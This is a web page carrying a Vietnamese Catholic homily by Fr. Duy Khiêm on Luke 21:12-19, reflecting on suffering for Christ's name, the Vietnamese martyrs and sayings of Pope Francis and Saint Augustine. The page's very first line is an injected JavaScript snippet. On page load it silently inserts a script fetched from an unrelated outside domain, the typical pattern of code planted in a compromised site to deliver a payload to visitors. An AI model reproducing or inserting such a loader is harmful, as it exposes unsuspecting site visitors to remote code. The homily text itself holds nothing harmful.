;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); “VÌ DANH THẦY” – Xitô PS

“VÌ DANH THẦY”

Thứ 4 Tuần XXXIV Thường Niên

(Kh 15,1-4; Lc 21,12-19)

Những ngày này chúng ta đang chứng kiến bầu cử tổng thống Mỹ, đầy căng thẳng và kịch tính. Trước đó, ứng cử viên tổng thống phải đi vận động và thường hứa hẹn với các cử tri sẽ đem lại những điều tốt đẹp cho cuộc sống của họ nếu họ bỏ phiếu cho mình. Con người thường ai cũng muốn chạy theo cái lợi, cái an toàn nên người ta sẽ bỏ phiếu cho ai đáp ứng nguyện vọng của họ. Thế mà Chúa Giêsu trong Tin Mừng hôm nay không hứa hẹn một cuộc sống an toàn, dễ dãi cho những ai theo Ngài. Ngài không hề úp mở khi tuyên bố ai theo Ngài sẽ phải chịu khổ nhục như Ngài đã chịu, sẽ bị bắt bớ, bị ngược đãi, bị tù đày, bị đem ra tòa đời (c.12). Họ còn sẽ bị nộp bởi chính người thân, bị mọi người thù ghét, và thậm chí bị giết hại (cc 16.17). Thật trái ngược với ước muốn tự nhiên của con người. Nhưng hơn hai ngàn năm lịch sử đã chứng minh sức cuốn hút của Chúa, lời thách thức của Chúa không hề làm người ta chùn bước. Giáo đoàn Giêrusalem tiên khởi vẫn luôn kiên vững dù bị đuổi ra khỏi Thánh Địa Palestina, giáo đoàn Roma bị bách hại suốt ba trăm năm. Và hôm qua chúng ta mừng kính các thánh tử đạo Việt Nam, các ngài đã kiên cường đưa Tin Mừng vào cuộc sống. Một trăm ba mươi ngàn chứng nhân tử vị đạo trải dài trong suốt gần ba trăm năm, dưới thời Trịnh Nguyễn, đặc biệt bị nhóm Văn Thân tru diệt dã man.

Được tử vì đạo đối với các ngài lạ một vinh dự, một phần thưởng, là hạnh phúc, như lời của thánh Phêrô Cao: “Xin cho con chịu đau khổ vì danh Đức Kitô, được đón nhận ngành lá tử đạo về tới bến thiên đàng”. Tất cả những gì các ngài phải chịu đều là vì danh Thầy Giêsu (cc 12.17).

Lịch sử Giáo Hội còn cho thấy rằng trong khi thân xác bị cực hình và chờ đợi giờ chết, các Kitô hữu chân chính đã biết bao lần viết lên những giờ phút thân mật thiết tha với Chúa Giêsu. Ngục tù có thể như một cung điện, đoạn đầu đài như một ngai vàng, cơn bão táp của đời sống giống như cảnh êm đềm mùa hạ khi có Chúa Giêsu ở với và ở cùng.

ĐTC Phanxicô nói trong giờ kinh truyền tin trưa thứ sáu ngày Lễ các Thánh 1 tháng 11 năm 2013 : “Các thánh không phải là những siêu nhân, cũng chẳng phải là những người sinh ra đã hoàn hảo. họ là những người đã sống cuộc sống bình thường, với vui mừng và đau khổ, cơ cực và hy vọng, trước khi đạt tới vinh quang thiên quốc. Một khi được biết tình yêu của Thiên Chúa, các ngài theo Chúa với trọn tâm hồn, vô điều kiện và không giả hình; các ngài hiến mạng sống để phục vụ tha nhân, chịu đựng đau khổ và nghịch cảnh mà không oán ghét và lấy thiện báo ác, phổ biến vui mừng và an bình…”

Chúa Giêsu tín nhiệm các môn đệ đến nỗi Ngài chỉ cho họ không phải một con đường dễ dãi, song là con đường vĩ nhân anh hùng. Ngài hứa: các môn đệ Ngài sẽ không bao giờ chịu khổ một mình. “Dù một sợi tóc trên đầu anh em cũng không bị mất đâu” (c. 18). Điều này muốn nói rằng, không một đau khổ nào vì danh Chúa sẽ rơi vào quên lãng. Nó sẽ đem lại hạnh phúc. Điều quan trọng là hãy kiên trì. Người nào bước đi với Chúa Giêsu có thể mất mạng sống nhưng không hề mất linh hồn. Chính tình yêu trung tín đối với Chúa Giêsu và thấm nhuần giáo huấn của Ngài đã khiến bao Kitô hữu tự nguyện đón nhận khổ đau, ngược đãi và cái chết như một sự đáp trả ân tình. Chân phước Anrê Phú Yên đã nói: “Tình yêu đáp lại tình yêu. Mạng sống đáp đền mạng sống”.

Con người không thể sống thiếu tình yêu, nên con người cũng sẵn sàng gánh chịu đau khổ vì yêu thương. Tình yêu rõ ràng và mãnh liệt được diễn tả trong đớn đau hay hy sinh tưởng như không thể vượt qua. Những gian nan, đau khổ phải chịu vì danh Chúa là cách diễn tả tình yêu đối với Ngài cách tuyệt vời. Thánh Augustino làm sáng tỏ điều này khi nói: “cuộc sống con người là sự xung đột giữa hai tình yêu: yêu Chúa đến độ khinh mình, hoặc yêu mình đến coi rẻ Thiên Chúa. Nếu tội là yêu mình đến coi rẻ Thiên Chúa thì dĩ nhiên tôi sẽ bám vào những gì tôi cho là sung sướng ở trần gian… Nhưng nếu tôi yêu Chúa đến độ coi thường bản thân, thì có bắt bớ vì Chúa, cũng chẳng mất mát gì; người ta có thể lấy tiền bạc, danh vọng, địa vị của tôi, chứ không thể lấy mất Chúa của tôi được, và đó là dịp để tôi rao giảng về Chúa cho người khác. Do đó, chẳng sợ gì hết, chỉ sợ tội mà thôi; cái căn bản là tình yêu đối với Chúa, nó làm thay đổi cuộc đời.”

Chúng ta cùng cầu xin Chúa cho chúng ta luôn mạnh mẽ trong niềm tin yêu Chúa, biết can đảm chấp nhận những thử thách, những trái ý nghịch lòng và sẵn sàng làm chứng cho Chúa trong tất cả mọi cảnh huống của cuộc đời.

Fr. Duy Khiêm

You May Also Like

Trả lời

X